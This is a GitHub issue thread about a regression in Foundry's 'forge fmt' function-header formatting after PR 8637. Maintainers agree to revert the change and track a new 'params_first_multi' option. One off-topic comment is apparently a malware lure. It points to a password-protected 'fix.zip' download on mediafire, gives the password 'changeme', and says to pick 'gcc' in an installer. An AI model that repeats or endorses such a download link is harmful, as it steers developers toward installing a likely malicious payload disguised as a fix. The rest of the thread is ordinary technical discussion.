### ISSUE TITLE
bug(fmt): regression introduced in PR 8637

### ISSUE THREAD

**Issue by mds1** [foundry-rs/foundry#8761]
### Component

Forge

### Have you ensured that all of these are up to date?

- [X] Foundry
- [ ] Foundryup

### What command(s) is the bug in?

forge fmt

### Operating System

None

### Describe the bug

https://github.com/foundry-rs/foundry/pull/8637 introduced a breaking change to formatting with no way to restore the original behavior. See comments by @smol-ninja (https://github.com/foundry-rs/foundry/pull/8637#issuecomment-2283601768) and @tynes (https://github.com/foundry-rs/foundry/pull/8637#issuecomment-2313943187) in that PR

Opening this new issue for tracking purposes/visiblity

**Comment by grandizzy** [comment]
Can revert the commit, but that would make behaviour inconsistent again with how is supposed to work per docs, @mds1 wdyt?

```
"params_first" - Break the function header into multiple lines, with each parameter on its own line. The function name stays on the first line.
```

**Comment by mds1** [comment]
> Also, I think disable line should work here if no formatting desired.

That's true, but it would be a lot of disable statements for large diffs, e.g. here's the diff introduced in the optimism codebase: https://github.com/ethereum-optimism/optimism/commit/2f9da08b3d70c4f21a00859a0440166ab6bce54b

I would suggest a new option like `params_first_multi` which is analogous to the pre #8637 behavior, i.e. it only splits parameters onto their own line when there is more then one param

**Comment by grandizzy** [comment]
makes sense, will revert that one then and track the new option

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by smol-ninja** [comment]
Having `params_first_multi` would be great. Thank you for picking up on this.
